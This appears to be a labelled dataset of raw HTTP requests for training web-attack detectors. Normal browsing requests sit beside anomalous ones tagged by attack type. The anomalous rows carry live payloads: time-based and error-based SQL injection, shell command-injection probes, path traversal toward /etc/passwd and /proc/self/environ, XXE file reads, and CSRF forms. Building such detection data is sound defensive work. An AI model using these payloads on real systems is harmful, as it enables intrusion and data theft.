raw_request
stringlengths
12
206k
label
stringclasses
2 values
attack_type
stringclasses
24 values
GET /rest/products/search?q=test HTTP/1.1 Cache-Control: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0 Referer: %68%74%74%70%3A%2F%2F%6C%6F%63%61%6C%68%6F%73%74%3A%33%30%30%30%2F%72%65%73%74%2F%70%72%6F%64%75%63%74%73%2...
anomalous
SQL Injection
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip,...
anomalous
Open_Redirect
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 83679b8e-5307-4e60-a1d6-891955898f1a
normal
null
GET /rest/products/search?q=") and sleep(5) HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-...
anomalous
SQL_Injection
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip,...
anomalous
Server-Side_Request_Forgery
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko) Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate ...
anomalous
Directory_Traversal
GET /?ref=3aa0992f-23a6-435b-b06d-d707a171362e&session_token=7857 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 3aa0992f-23a6-43...
normal
null
GET /login.php HTTP/1.1 Cache-Control: no-cache Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1; security=low User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15%';SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND ...
anomalous
SQL Injection
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 874058fc-65a6-45f1-91e1-a82ae10bd03f
normal
null
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 3f854a0d-f521-4f42-a3b7-069bf43d1d60
normal
null
GET /vulnerabilities/sqli/?id=1 HTTP/1.1 User-Agent: ??%e0%80%af??%e0%80%afetc%e0%80%afissue Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8...
anomalous
Directory_Traversal
GET /rest/products/search?q=cup&cache_id=09d9051d-3d07-4675-a06b-175c80bdaa38 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 09d9...
normal
null
GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1 Cache-Control: no-cache Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1; security=low User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15));SELECT PG_SLEEP(5)-- Referer: http://localhost/vu...
anomalous
SQL Injection
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: dad0a07f-251f-4b00-af32-55428725f452
normal
null
GET /portal/sharing/rest HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Connection: close Accept: */* Accept-Language: en Accept-Encoding: gzip
anomalous
Advanced Vulnerability Scan
GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1 Cache-Control: no-cache Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1; security=low User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15) OR UPDATEXML(4095,CONCAT(0x2e,0x717a6a7171,(SELECT...
anomalous
SQL Injection
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 80f4213a-b34a-48f0-a514-ea8240eba4f4
normal
null
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip,...
anomalous
XML_External_Entity
GET /rest/products/search?q=%20%26sleep%200%20%26%26YUI=%24%28echo%20UHDDYK%29%26%26YUI1=%24%7B%23YUI%7D%26%26%5B%205%20-eq%20%24YUI1%20%5D%26%26sleep%201%5C%5C HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: commix/v4.2.dev1 (https://commixproject.com) Referer: http://localhost:3000/rest/products/...
anomalous
Command Injection
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 9d71a337-b9c5-43ba-b330-5c2fbde7dda9
normal
null
GET /login.php HTTP/1.1 Cache-Control: no-cache Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1; path=/;security=low%27%29%29%20AND%20GTID_SUBSET%28CONCAT%280x717a6a7171%2C%28SELECT%20%28ELT%283099%3D3099%2C1%29%29%29%2C0x717a6b7871%29%2C3099%29%20AND%20%28%28%27Zxir%27%3D%27Zxir User-Agent: Mozilla/5.0 (Macintosh; Intel ...
anomalous
SQL Injection
GET /vulnerabilities/sqli/?id=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 ...
anomalous
Server_Side_Include_Injection
GET /vulnerabilities/sqli/?id=1 HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko) Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, defl...
anomalous
Cross-Site_Scripting
GET /rest/products/search?q=premium&cache_id=389a11ef-4e34-43de-8ed0-d6f9878bfc87 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: ...
normal
null
GET /login.php HTTP/1.1 Cache-Control: no-cache Cookie: PHPSESSID=ori90r71f9d47p2vf90skvvks0; path=/;security=low User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15 Referer: http://localhost/vulnerabilities/sqli/ Host: localhost Accept: */*...
anomalous
SQL Injection
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip,...
anomalous
Cross-Site_Request_Forgery
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: ff2d2c0c-a286-4593-b2f7-213473c4aa9f
normal
null
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 10ad4a0d-acef-4f5a-8209-7ac4af1e4baf
normal
null
GET /vulnerabilities/sqli/?id=1 HTTP/1.1 User-Agent: ..../%%32%%66..../%%32%%66..../%%32%%66boot.ini Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-...
anomalous
Directory_Traversal
GET /rest/products/search?q=%20%22%3BYUI=%24%28echo%20HIMHDT%29%3BYUI1=%24%7B%23YUI%7D%3Bif%20%5B%205%20-eq%20%24YUI1%20%5D%3Bthen%20sleep%201%3Bfi HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: commix/v4.2.dev1 (https://commixproject.com) Referer: http://localhost:3000/rest/products/search Host: ...
anomalous
Command Injection
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Acce...
anomalous
Server-Side_Request_Forgery
GET /rest/products/search?q=%20%22%3BYUI=%24%28echo%20VRRIJU%29%3BYUI1=%24%7B%23YUI%7D%3Bif%20%5B%205%20-eq%20%24YUI1%20%5D%3Bthen%20sleep%201%3Bfi%3B HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: commix/v4.2.dev1 (https://commixproject.com) Referer: http://localhost:3000/rest/products/search Hos...
anomalous
Command Injection
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 4eec2c5e-74ce-40cf-bf2f-d9bddd38bd87
normal
null
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: c3c39255-2e4b-487f-884d-51e55a029788
normal
null
GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1 Cache-Control: no-cache Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1; security=low User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15 Referer: http://localhost/vulnerabilities/sqli/) OR...
anomalous
SQL Injection
GET /rest/products/search?q=%20%7C%5B%204%20-ne%20%24%28echo%20FDQAHI%20%7Ctr%20-d%20%27%5Cn%27%7Cwc%20-c%29%20%5D%7C%7Csleep%201%26%26 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: commix/v4.2.dev1 (https://commixproject.com) Referer: http://localhost:3000/rest/products/search Host: localhost:30...
anomalous
Command Injection
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/120.0.0.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x...
anomalous
LDAP_Injection
GET /vulnerabilities/sqli/?id=1%27%29%20OR%207252%3DRAISE_ERROR%28CHR%2855%29%7C%7CCHR%2848%29%7C%7CCHR%2848%29%7C%7CCHR%2848%29%7C%7CCHR%2849%29%2CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287252%3D7252%29%20THEN%201%20ELSE%200%20END%29%20FR...
anomalous
SQL Injection
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, d...
anomalous
Cross-Site_Request_Forgery
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: fb24108e-69a0-4394-9d3e-8dbecca39e88
normal
null
GET /_api/web/lists HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15 Connection: close Accept: */* Accept-Language: en Accept-Encoding: gzip
anomalous
Advanced Vulnerability Scan
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 99805975-9b8d-40bf-bc9f-27a7f8ecdc31
normal
null
GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1 Cache-Control: no-cache Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1; security=low User-Agent: -9132"))) OR (SELECT (CASE WHEN (3054=3054) THEN NULL ELSE CAST((CHR(67)||CHR(122)||CHR(106)||CHR(68)) AS NUMERIC) END)) IS NULL AND ((("uzwa"="uzwa Referer: http://local...
anomalous
SQL Injection
GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1 Cache-Control: no-cache Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1%2C%28CASE%20WHEN%207467%3D7467%20THEN%201%20ELSE%20NULL%20END%29; security=low User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Sa...
anomalous
SQL Injection
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: c6df9bb0-129f-4bf4-b63d-14663cd0f1e1
normal
null
GET /login.php HTTP/1.1 Cache-Control: no-cache Cookie: PHPSESSID=016l3es9fkuq1bqv8vs7fu25e0; path=/;security=low User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15 Referer: http://localhost/vulnerabilities/sqli/ Host: localhost Accept: */*...
anomalous
SQL Injection
GET /rest/products/search?q=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc/self/environ HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application...
anomalous
Directory_Traversal
GET /login.php HTTP/1.1 Cache-Control: no-cache Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1; path=/;security=low%25%27%20AND%209705%3D%28SELECT%209705%20FROM%20PG_SLEEP%285%29%29%20AND%20%27McZG%25%27%3D%27McZG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version...
anomalous
SQL Injection
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 4ea513a9-c392-4ea7-a9e7-201c92c00142
normal
null
GET /rest/products/search?q=??\??\??\etc\issue HTTP/1.1 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text...
anomalous
Directory_Traversal
GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1 Cache-Control: no-cache Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1; security=-6838%27%29%20OR%201228%3D1228%23 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15 Referer: http://local...
anomalous
SQL Injection
GET /rest/products/search?q=<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file://///proc/self/environ"> ]><foo>&xxe;</foo> HTTP/1.1 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 Pragma: no-cache Cache-Control: no-cache Accept: t...
anomalous
XML_External_Entity
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/...
anomalous
HTML_Injection
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko) Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate ...
anomalous
Directory_Traversal
GET /rest/products/search?q=premium&cache_id=0e6406cd-5e54-48e6-97db-9c6715805372 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: ...
normal
null
GET /vulnerabilities/sqli/?id=1 HTTP/1.1 User-Agent: <form action="/delete-account?" method="PATCH"><input type="hidden" name="csrfmiddlewaretoken" value="superadmin"><input type="hidden" name="csrf_token" value="0"><input type="hidden" name="authenticity_token" value="attacker"><input type="hidden" name="user_id" valu...
anomalous
Cross-Site_Request_Forgery
GET /rest/products/search?q=sale&cache_id=0e6c617f-0d3f-4ab0-b349-62f048ec4ee9 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 0e6...
normal
null
GET /vulnerabilities/sqli/?id=1%20AND%205975%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285975%3D5975%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CC...
anomalous
SQL Injection
GET /vulnerabilities/sqli/?id=1 HTTP/1.1 User-Agent: \logs\httpd\error_log Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Ac...
anomalous
Local_File_Inclusion
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 0fbbe997-b136-4e4c-a34b-7cafb2dbbc69
normal
null
GET /vulnerabilities/sqli/?id=<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ENTITY p1 SYSTEM "expect:///etc/crontab"> ]><xxe>&p1;</xxe> HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,applicatio...
anomalous
XML_External_Entity
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: d5f690cf-cd40-4e5d-b023-d6a4bcda21f6
normal
null
GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1 Cache-Control: no-cache Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1; security=low%27%20WHERE%206977%3D6977%20RLIKE%20SLEEP%285%29%23 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15 ...
anomalous
SQL Injection
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Acce...
anomalous
Server-Side_Request_Forgery
GET /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:139.0) Gecko/20100101 Firefox/139.0 Connection: close Accept: */* Accept-Language: en Accept-Encoding: gzip
anomalous
Advanced Vulnerability Scan
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: e1118749-358d-4651-bde0-80c1d68307db
normal
null
GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1 Cache-Control: no-cache Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1; security=low User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15 Referer: http://localhost/vulnerabilities/sqli/")))...
anomalous
SQL Injection
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: e3c6d41e-c0b2-4bc1-9ce8-c39cb2392bf8
normal
null
GET / HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 706963a2-9777-40be-ad41-1120d9a106ee
normal
null
GET /rest/products/search?q=.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25af.%00.%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Pragma:...
anomalous
Directory_Traversal
GET /flatpress/fp-content/ HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Connection: close Accept: */* Accept-Language: en Accept-Encoding: gzip
anomalous
Advanced Vulnerability Scan
GET /vulnerabilities/sqli/?id=& HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko) Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, defl...
anomalous
Cross-Site_Scripting
GET /rest/products/search?q=shirt&cache_id=a5a49205-24c6-45da-aeec-fa64df1c9201 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: a5...
normal
null
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip,...
anomalous
SQL_Injection
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko) Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate ...
anomalous
Cross-Site_Request_Forgery
